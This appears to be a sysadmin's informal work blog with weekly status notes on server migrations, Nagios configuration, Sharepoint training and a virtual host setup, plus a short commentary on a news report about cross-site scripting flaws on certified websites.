Nagios/Fruity Migration: Hoss and services are being manually imported with the new Fruity tool.
ITS Website Migration: The server has been built in the .1 network for development and testing, and user accounts have been created for the vendor. Training has also been scheduled.
Mailgate Migration: My involvement here has been very minimal this month since the mailgates have been moved behind the CSM. My activities here have been primarily housekeeping and documentation.
Sitemason Migration: The Sitemason services were migrated to the new servers. The frontend web server is running in a VM, and the backend database server is running on physical hardware. The site has been running pretty well, and I been making periodic checks at the OS layer to make sure that everything is OK. The frontend server was built with twice a much memory (4GB) as the original, and the system is using up to 95% of it at times. The system has managed to use a small bit of swap. Unfortunately, I was not able to catch what activity was occurring on the system at the time.
Sharepoint Training: I attended the introduction to Sharepoint training .
Sharepoint Service Site: I've setup another Apache virtual host on one of the existing VMs. The non-SSL site will be used as a service info and directory site, and the SSL site is intended to dress up the URL that the user sees. I'm still working on the second part of this task.
Team Voice Communication Testing: I've been lucky enough to get a Plantronics bluetooth headset to pair with my phone and my laptop. I've even installed Live Messenger (LM) so that I can take advantage of the voice feature. I can definitely say that I prefer Pidgin, and at some point when I get the time I'll post up a comparison.
I wanted to hold my review of the Sharepoint class until it was complete. Well, my 2.5 day introduction to Microsoft Sharepoint is done, and while I do appreciate the opportunity, I don't think that I learned anything new. I suspect that the rest of the AppHosting team would agree that the class was rather elementary in scope. The exercises were rather basic, and I had encountered most of it in my normal usage of our team sites. I don't know what the instructor's background was, but he was not prepared to answer any questions that deviated beyond the labs.
On a related note, I launched another Apache virtual host to serve as the informational and site directory page for the ITS Sharepoint service. I'm also doing some testing on rewriting and proxying URLs to the real Sharepoint service. I've still got a bit more work to do on this part.
The FIPP website is back online thanks to the folks over at Hammock Publishing.
I'll be spending the next 2.5 days in a Sharepoint introduction class which is being taught by Quilogy. From what I can tell, the training manual has been expanded a little bit with more screenshots than the first class had. We'll see if my impression of the class matches up with what I've heard so far.
I found this InformationWeek article while surfing after the Sitemason change. According to a pair of researchers, over 60 ScanAlert Hacker Safe certified sites (including one for the company itself) have been vulnerable to cross site scripting (XSS) attacks. There were some pretty recognizable websites on the list like cafepress.com and cduniverse.com.
It's interesting to note that the director of the Hacker Safe program apparently made a statement that XSS vulnerabilities can't be used to hack the website's server. I like this statement from him: "But the customer data protected with the server, in the database, isn't going to be compromised by a cross-site scripting attack, not directly." Unfortunately that's not entirely true. The intent of an XSS attack is to insert HTML code into the target website to affect the user experience. Common targets are login forms and such. Anyone that submits data to an inserted or tampered form risks having their data whisked away to an unscrupulous website. While the site itself has not been harmed, the alternate path for that form data could result in some serious problems for the site user.
It looks like ScanAlert might need to update their scanning engine. Hopefully those 60 sites will get things taken care of pretty quickly. As usual the best defense for this is to know the sites that you surf. Make sure that when you follow a link to a site that it came from a site that you are familiar with.
The Sitemason migration has been completed. The frontend and backend servers were migrated to new hardware- one virtual and one physical. Once again the life-cycle-replacement clock has been restarted for another service.
I logged into the Windows Live site for the first time today, and I received this SSL warning from Firefox 3b2. The cert is issued by the Microsoft Secure Server Authority, which Firefox does not know anything about. No such error on the IE side. One exception added in Firefox…
I've got an up2date running on my development web server while I'm working on my weekly incident report. Hopefully I finish my report before the up2date completes.
The new Nagios service is intermittently running as new hosts and services are added to the configuration. At this time, sendmail is shutdown to prevent the alerts from going out. It's basically trial and error to make sure that the checks in the current environment are carried over. It's tedious work without a build document.
